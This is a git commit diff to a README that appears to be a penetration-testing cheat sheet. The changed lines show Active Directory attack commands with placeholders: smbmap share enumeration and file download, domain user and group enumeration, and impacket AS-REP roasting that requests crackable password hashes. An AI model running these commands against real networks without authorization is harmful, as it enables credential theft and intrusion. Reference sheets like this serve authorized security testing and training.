Update README.md

Joe Totes
2022-09-06 10:32:16 -04:00
committed by GitHub
parent c200d697c0
commit 66be963dd3


@@ -486,7 +486,7 @@ ldapsearch -H ldap://{IP ADDRESS} -x -b "{DC NAMING CONTEXT}" '(objectClass=Pers
smbmap -H {IP ADDRESS}
# Recursively show all readable files and shares
smbmap -R {SHARE} -H {IP ADDRESS}
smbmap -R {SHARE} -H {IP ADDRESS} --depth 10
# Download a file with smbmap
smbmap -R {SHARE} -H {IP ADDRESS} -A {FILE} -q
@@ -663,10 +663,13 @@ net user {USERNAME} /domain
# Enumerate all groups in domain
net group /domain
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
# Get Active Directory Users
python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# Bloodhound
sudo neo4j console # LHOST